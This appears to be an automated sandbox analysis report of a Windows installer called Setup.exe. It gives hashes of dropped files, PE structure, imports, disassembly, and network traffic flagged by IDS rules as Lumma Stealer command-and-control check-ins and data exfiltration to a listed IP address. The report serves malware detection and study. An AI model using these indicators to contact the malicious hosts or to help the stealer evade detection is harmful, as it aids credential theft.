SSDEEP: | 1536:8/0N4lcIYCWG0ph5xgLlRvZYIrxu4jXKi9sPwA34spFsgpw:XN4lcZpHxgDHxuG68Md4spFsx |
MD5: | F457AD0A5F00E5A7ECEF773EC59B462C |
SHA1: | D88E867F9AC7DDC7F88179C61D3B214D1AA05054 |
SHA-256: | 23247486B72F1336F56F959A21F78CC4643C26AB9E18F76C654778E3357EF805 |
SHA-512: | 5EA2E4499C0C9A8393B3EAFAF477EF06073E21117FBC62BE1CD9CB6B2CF854AE84D184C7EC86BD9BDF3DC58B673C52DA33201370C0A87F414F00346A3E8A5FAB |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 93184 |
Entropy (8bit): | 6.565678673944368 |
Encrypted: | false |
SSDEEP: | 1536:5ESvn+pqFqaynB6GMKY99z+ajU1Rjv18fRQLTh/5fhjLueoMmOrrHL/uDoiouK+X:5ESv+AqVnBypIbv18mLthfhnueoMmOqn |
MD5: | 82BF7FEF5576E4D83301419E5DBE5A38 |
SHA1: | 5CFD9DEDC5F1007BE833C07B0738651686575E05 |
SHA-256: | 35517B54CB9BB9DC03ECB85D5A6D63713503B28BD87A842533DAECF409FCA6D3 |
SHA-512: | 524A37626AD0AD9B1ADBB4602C6E86125650FA28185EABCD8C4FBBC88A5AA99B7777A92F2185AF83B16A508C91F469B954FF530612DFAC238718BBE2336C7F3C |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 61440 |
Entropy (8bit): | 6.510250154311809 |
Encrypted: | false |
SSDEEP: | 768:nr8qcDP8WBosd0bHazf0Tye4Ur2+9BGmd9OTGQ1DvA:nrDWyu0uZo2+9BGmdATGODvA |
MD5: | 33442E116B74223DA22F0699F78F24C9 |
SHA1: | E6F2A7C46998431511346C311C52104D785012C7 |
SHA-256: | 7ED1E8F16980C7164B7B096E01441A2A40226B96E59B1CCAA3EB1F64E7C79C30 |
SHA-512: | 44727D16EB2863535B996FEFBAF83C8268A37ACCE4E7B7BEA5AD9296D94D0318B1EDE96ECA99CF9AA877CD84B4014759F04FE5E374EE7944C62F4D43C01F2582 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\Setup.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 83968 |
Entropy (8bit): | 7.997817253734148 |
Encrypted: | true |
SSDEEP: | 1536:S9wZQ8BS+IBRTMcTj447/ZwHF44TN+SIYkfYJkNJE7+RQ0VOxK3qxhkeJCE1HKTD:6waenIBRYcn9/ZENWfbNJc+RJVgK6xhm |
MD5: | 4D0FE6780B9020AA6D4C0F2712DBA5F2 |
SHA1: | E1BE6019E8E31CC0915E23A9E7FA69CD24636582 |
SHA-256: | DF2E85AC13613CF0932F3FD6B358F5D5AB501B5E2EFF483717C8B1E25782DBBC |
SHA-512: | CF02AD21CE505C13A0C5E2C9DDA613A753D11645E9F3F8C35DD86070A3B7BA5326B584EAA8301F8625CB50323BB1C8D3EB255EF13CC690389C581A9C2C39D3BF |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\Setup.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 94208 |
Entropy (8bit): | 7.998324667497178 |
Encrypted: | true |
SSDEEP: | 1536:lWQkRhuipYfchEEMSOlnHadEEGRUK7b6lRT3RhbjuKjAty+etPkb5:zkRhuOYeEEJOln6+EGV7b6lRVh9AtyvU |
MD5: | 4961AE68CC712E49E667D33BCDFA38C4 |
SHA1: | EAB641942B30D79BE68FF8CC820D076919C2F7D8 |
SHA-256: | E887DA35D8CA3ADCC569D6FFF43D0BFE48F221EB2890D2F49BF3CCEF5B17E476 |
SHA-512: | DA9015E60291EE8B60C3B4B3C3E8FFC2507FD62E52CBEBB4B7E2EEC28B5B38413BD977E04B3BDF13637AB2193403B70C4BFA74B2A3EC44ADC6C31BEDC1709F76 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\Setup.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 489616 |
Entropy (8bit): | 7.9985776416409 |
Encrypted: | true |
SSDEEP: | 12288:S/C7tpUu7tHxkHtIDAVpv+Lke0pPwUF5sowlE2OD1AEi0xjDg:OC7Au7twtuArvA90pPb5fwy22hPg |
MD5: | 1CF9C7908C62A1F69B4FE75F36407147 |
SHA1: | C64C982ED8E64F220C894F79DED872F061E171C6 |
SHA-256: | FA801AFFA7F65A8F3DCB9B7A6CC54D1D0E0F27E76079303CC4FC3D368D461FC2 |
SHA-512: | FBD772071970B53D81F9F826124F8A1C7500C764C50DE4EA84A9C84C725C9F1FCA2D8695A3D7428E25BF6E08B6476367E92874937E2BCFACCFA51453DB49DDC1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 137216 |
Entropy (8bit): | 6.407362330192795 |
Encrypted: | false |
SSDEEP: | 3072:Vg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWf05mW:G5vPeDkjGgQaE/loUDtf0t |
MD5: | D67580F456C779E35A08802F44600197 |
SHA1: | 452150324ACB07F919727B80BFD1EE8A73EA0D24 |
SHA-256: | 6545454D9CBEEE48426F99893B75AE304F6F82E8C4FF92E8CB4CE65D64ABC770 |
SHA-512: | 1DE3774C429E8F49C728D9FF0F0D596AC0C764BD50B643541C7C57F33B69CDA1D8988BFB8AC7AE29F6B1B92829FD126AB0EB1D904C6BF8FB7D737F9D5A0B5AD0 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 28205 |
Entropy (8bit): | 7.217404448691553 |
Encrypted: | false |
SSDEEP: | 768:2sMvLHfR/ZByLiFuO/ChgZ45VatJVEV3GPkjF:2xvTphAiPChgZ2kOE6 |
MD5: | D6F0021C350669CCB5311E5A7E4EE512 |
SHA1: | 8E8EF783E760902E9247EB9FA6CC01E4063EEC5D |
SHA-256: | 265CFFEBEF310CF141736F946222D7605C619BEE3583693CB527922469217F6B |
SHA-512: | 31BCBE7ED8FAFB0C5F355682F11BC7479CB205EDC690F675551B9822EAAF5489E5FD3817DB2F8EEDB6566DEE3298BC76D3AEF554E9DCBA192CBEDDADA59317A4 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 125952 |
Entropy (8bit): | 6.676474311165727 |
Encrypted: | false |
SSDEEP: | 3072:occBiqXvpgF4qv+32eOyKODOSpQSAU4CE0Iz:occB3gBmmLsiS+SAhCM |
MD5: | 60184E1449CECF77E7C0B67686AE93A6 |
SHA1: | F3E95249BCB20ABEEEB0E7BCDF1D72BD78BE7C5B |
SHA-256: | DCE03F1084D6F86A0FE85207B94E2B42A1227D662150B61050DEACE350A6157D |
SHA-512: | C6C19C826F01E76B137B18109A835C0F6FCCAD4D6D02FE8A8BEE2BE6F6FE86CB66C496AF049ACACF9329F21FA89701D67E3E13285AD4ED71BB09BD0687CE77C8 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\Setup.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 90112 |
Entropy (8bit): | 7.998041168228369 |
Encrypted: | true |
SSDEEP: | 1536:3LE2Em0MKmFYoGw+VEL/YqdOv0PM1H7epymNxrYKzRzoqOa5:42EmqkVGw+VEjy8pJr8EREqB |
MD5: | 907215AD181011930BB17ED808A565FA |
SHA1: | 5D6F8A4B8742B501658EFF75073BCA0C696D9A9A |
SHA-256: | 74DEF03C3833E35519C1BD61CC9093B815517102A52BA7EB5518962186C66896 |
SHA-512: | 52DED92ADE76D2FFEA291702B5FC44DD8012788F1F2E4E44C180B9A23C1DC8D91B5C6A85662AC1905AF146F10EC4EFAF4C294B0875E5798226086DCE6DEF13E3 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 79872 |
Entropy (8bit): | 6.593428770069909 |
Encrypted: | false |
SSDEEP: | 1536:6Fdni8yDGVFE5gOHu1CwCMIBZwneAJu7QnswIPumV3BxZxu6/sPYcSyRXzW8/uC/:6bi80PtCZEMnVIPPBxT/sZydTmj |
MD5: | 7654374E2E43E28971C5CD535BAF1ED8 |
SHA1: | A452A5432BBFD53D97B15E3A5756B633636A5BF7 |
SHA-256: | 9231ECE5B6A4FDF26363E968040A22D1DD4511985FCE8828BA0E2FF30B9B4E6F |
SHA-512: | 0FF536A18CBBCFE48608D93942A43335A7F5B7629051BD20058B55795417EAA95FE2F587E4920D779219DB5B60734817B33D48856F1FEEA1FC66BC3A5372FBFD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1510207563435464 |
Encrypted: | false |
SSDEEP: | 3:NlllulPki/llllZ:NllUcylll |
MD5: | D8D47FD6FA3E199E4AFF68B91F1D04A8 |
SHA1: | 788625E414B030E5174C5BE7262A4C93502C2C21 |
SHA-256: | 2D9AF9AB25D04D1CF9B25DB196A988CD6E4124C1B8E185B96F2AB9554F4A6738 |
SHA-512: | 5BFD83D07DC3CB53563F215BE1D4D7206340A4C0AB06988697637C402793146D13CDDE0E27DC8301E4506553D957876AC9D7A7BF3C7431BBDD5F019C17AB0A58 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\250661\Creates.com |
File Type: | |
Category: | dropped |
Size (bytes): | 16791 |
Entropy (8bit): | 4.431180163596247 |
Encrypted: | false |
SSDEEP: | 192:xSD+TD90sp7aSVbJ/CtzfWdYdKG7VhN3EpIJ5tFtQjMY5VhIJ+Ik:7azfVZ3LPQD6J7k |
MD5: | 2E59DF53309DBD234F876BAD5C73F5B4 |
SHA1: | BB243841CEA5D85A0E2849C949B9BB11CEB4FC33 |
SHA-256: | B73DF91C83960A7DCCE8F112B1F7E4DB8EC6B659D4AC706F79A1A703297533DD |
SHA-512: | 34C966EC7213CA502849BAC1BB6B18A3C4B30EC07EB8FFAA837D048ED853C15842256C6C2869F96ADBA2EB9994A85393CED0CEDC72B9A9DA8E08BB019FBB3E5A |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\250661\Creates.com |
File Type: | |
Category: | dropped |
Size (bytes): | 1835008 |
Entropy (8bit): | 4.462920658383473 |
Encrypted: | false |
SSDEEP: | 6144:mIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uN2dwBCswSbn:LXD94+WlLZMM6YFHg+n |
MD5: | DF7E269C8883125CB1D3EC00747E84B1 |
SHA1: | 31B379B70E6D5053069FF79051688BCC6DE4AE96 |
SHA-256: | 90C0BE5C60E60074F71320462DD63C85E7B36319ACE15ABF6302C53AEED55FB7 |
SHA-512: | 7D50BA4DFFFF054AFF5ACAF9AC00C24A1F8CE50B5EE86C0FC76953E890EBCF112CAC1C0D563BD4B8DC193AEFDE7FB5E1CDF223F72ED3AD2AE30AB99BFEF5E338 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.3683921081884 |
TrID: |
|
File name: | Setup.exe |
File size: | 73'410'899 bytes |
MD5: | 6d9439c5afd2cb8deeb2bd71a93e7828 |
SHA1: | 392ffe0569edd73a17f33a95b1aa780aa03903c6 |
SHA256: | 61c2f08d40d9d6d4a8bb4cc109ae7489c0dd263739898f90f67df75c414bea15 |
SHA512: | dde7c930427a85c18c21fcfb5d53c800b6bba2b79bf5058afd75b7119d419953194a0e32383ab3267b24823fcdd9129003f37058cad90518cee256460ba3f428 |
SSDEEP: | 24576:Ytduzei3c4w+MTFpkqcsv2qBa7tsp0Lclw4BrlRHu:Sni3c4kHkNsv2H7SpOIrBrlRHu |
TLSH: | BDF7122CF2782545B5471EF356E01E23AC38BA42F71018E9C62DE41C73A2A53767B76B |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L...X|.N.................n.......B...8..... |
Icon Hash: | 6062e2e2d8c4fc1c |
Entrypoint: | 0x403883 |
Entrypoint Section: | .text |
Digitally signed: | true |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | EXECUTABLE_IMAGE, 32BIT_MACHINE |
DLL Characteristics: | DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Time Stamp: | 0x4E807C58 [Mon Sep 26 13:21:28 2011 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 5 |
OS Version Minor: | 0 |
File Version Major: | 5 |
File Version Minor: | 0 |
Subsystem Version Major: | 5 |
Subsystem Version Minor: | 0 |
Import Hash: | be41bf7b8cc010b614bd36bbca606973 |
Signature Valid: | false |
Signature Issuer: | CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US |
Signature Validation Error: | The digital signature of the object did not verify |
Error Number: | -2146869232 |
Not Before, Not After |
|
Subject Chain |
|
Version: | 3 |
Thumbprint MD5: | 5D2A3557A29B3D769CD29535A5E3D35D |
Thumbprint SHA-1: | 6C7552617E892DFCA5CEB96FA2870F4F1904820E |
Thumbprint SHA-256: | 77E85A01A656323340749C2D61FA129C86DA12533CAC6A4FCF2C81C9D8D63A40 |
Serial: | 0DE9CF2E718364A0062E0D83093E34D7 |
Instruction |
---|
sub esp, 000002D4h |
push ebx |
push ebp |
push esi |
push edi |
push 00000020h |
xor ebp, ebp |
pop esi |
mov dword ptr [esp+18h], ebp |
mov dword ptr [esp+10h], 00409268h |
mov dword ptr [esp+14h], ebp |
call dword ptr [00408030h] |
push 00008001h |
call dword ptr [004080B4h] |
push ebp |
call dword ptr [004082C0h] |
push 00000008h |
mov dword ptr [00472EB8h], eax |
call 00007F387CF842FBh |
push ebp |
push 000002B4h |
mov dword ptr [00472DD0h], eax |
lea eax, dword ptr [esp+38h] |
push eax |
push ebp |
push 00409264h |
call dword ptr [00408184h] |
push 0040924Ch |
push 0046ADC0h |
call 00007F387CF83FDDh |
call dword ptr [004080B0h] |
push eax |
mov edi, 004C30A0h |
push edi |
call 00007F387CF83FCBh |
push ebp |
call dword ptr [00408134h] |
cmp word ptr [004C30A0h], 0022h |
mov dword ptr [00472DD8h], eax |
mov eax, edi |
jne 00007F387CF818CAh |
push 00000022h |
pop esi |
mov eax, 004C30A2h |
push esi |
push eax |
call 00007F387CF83CA1h |
push eax |
call dword ptr [00408260h] |
mov esi, eax |
mov dword ptr [esp+1Ch], esi |
jmp 00007F387CF81953h |
push 00000020h |
pop ebx |
cmp ax, bx |
jne 00007F387CF818CAh |
add esi, 02h |
cmp word ptr [esi], bx |
Programming Language: |
|
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9b34 | 0xb4 | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf4000 | 0x5426 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x45fffdb | 0x2978 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7a000 | 0x964 | .ndata |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2d0 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x6dae | 0x6e00 | 00499a6f70259150109c809d6aa0e6ed | False | 0.6611150568181818 | data | 6.508529563136936 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0x8000 | 0x2a62 | 0x2c00 | 07990aaa54c3bc638bb87a87f3fb13e3 | False | 0.3526278409090909 | data | 4.390535020989255 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0xb000 | 0x67ebc | 0x200 | 014871d9a00f0e0c8c2a7cd25606c453 | False | 0.203125 | data | 1.4308602597540492 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.ndata | 0x73000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rsrc | 0xf4000 | 0x5426 | 0x5600 | cadb0e7486b41e3cbf95366671ad2b99 | False | 0.9225563226744186 | data | 7.706695976801168 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.reloc | 0xfa000 | 0xf32 | 0x1000 | 84a88aed9f9e9d247ad8d95209e4cd87 | False | 0.600341796875 | data | 5.528256725067058 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_ICON | 0xf41c0 | 0x4888 | PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced | English | United States | 1.000861697544162 |
RT_ICON | 0xf8a48 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.6285460992907801 |
RT_DIALOG | 0xf8eb0 | 0x100 | data | English | United States | 0.5234375 |
RT_DIALOG | 0xf8fb0 | 0x11c | data | English | United States | 0.6056338028169014 |
RT_DIALOG | 0xf90cc | 0x60 | data | English | United States | 0.7291666666666666 |
RT_GROUP_ICON | 0xf912c | 0x22 | data | English | United States | 0.9705882352941176 |
RT_MANIFEST | 0xf9150 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193 |
DLL | Import |
---|---|
KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW |
USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW |
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject |
SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation |
ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW |
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create |
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance |
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T23:25:52.975929+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49737 | 172.67.223.109 | 443 | TCP |
2025-01-10T23:25:53.459399+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49737 | 172.67.223.109 | 443 | TCP |
2025-01-10T23:25:53.459399+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49737 | 172.67.223.109 | 443 | TCP |
2025-01-10T23:25:53.939706+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49738 | 172.67.223.109 | 443 | TCP |
2025-01-10T23:25:54.438326+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49738 | 172.67.223.109 | 443 | TCP |
2025-01-10T23:25:54.438326+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49738 | 172.67.223.109 | 443 | TCP |
2025-01-10T23:25:55.487739+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49739 | 172.67.223.109 | 443 | TCP |
2025-01-10T23:25:56.668287+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49740 | 172.67.223.109 | 443 | TCP |
2025-01-10T23:25:58.561139+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49741 | 172.67.223.109 | 443 | TCP |
2025-01-10T23:25:59.959189+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49742 | 172.67.223.109 | 443 | TCP |
2025-01-10T23:26:00.431403+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49742 | 172.67.223.109 | 443 | TCP |
2025-01-10T23:26:00.937079+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49743 | 172.67.223.109 | 443 | TCP |
2025-01-10T23:26:03.143433+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49744 | 172.67.223.109 | 443 | TCP |
2025-01-10T23:26:05.129327+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49745 | 172.67.223.109 | 443 | TCP |
2025-01-10T23:26:12.724779+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49745 | 172.67.223.109 | 443 | TCP |
2025-01-10T23:26:13.579047+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49782 | 185.161.251.21 | 443 | TCP |
2025-01-10T23:26:14.382673+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49791 | 172.67.162.153 | 443 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 10, 2025 23:25:52.359177113 CET | 49737 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:52.359211922 CET | 443 | 49737 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:52.359296083 CET | 49737 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:52.365663052 CET | 49737 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:52.365679026 CET | 443 | 49737 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:52.975812912 CET | 443 | 49737 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:52.975929022 CET | 49737 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:52.980144024 CET | 49737 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:52.980149984 CET | 443 | 49737 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:52.980593920 CET | 443 | 49737 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:53.033936977 CET | 49737 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:53.043407917 CET | 49737 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:53.043426037 CET | 49737 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:53.044751883 CET | 443 | 49737 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:53.459395885 CET | 443 | 49737 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:53.459523916 CET | 443 | 49737 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:53.459573984 CET | 49737 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:53.461694956 CET | 49737 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:53.461713076 CET | 443 | 49737 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:53.466593027 CET | 49738 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:53.466701031 CET | 443 | 49738 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:53.466798067 CET | 49738 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:53.467055082 CET | 49738 | 443 | 192.168.2.4 | 172.67.223.109 |
Jan 10, 2025 23:25:53.467094898 CET | 443 | 49738 | 172.67.223.109 | 192.168.2.4 |
Jan 10, 2025 23:25:53.939532042 CET | 443 | 49738 | 172.67.223.109 | 192.168.2.4 |
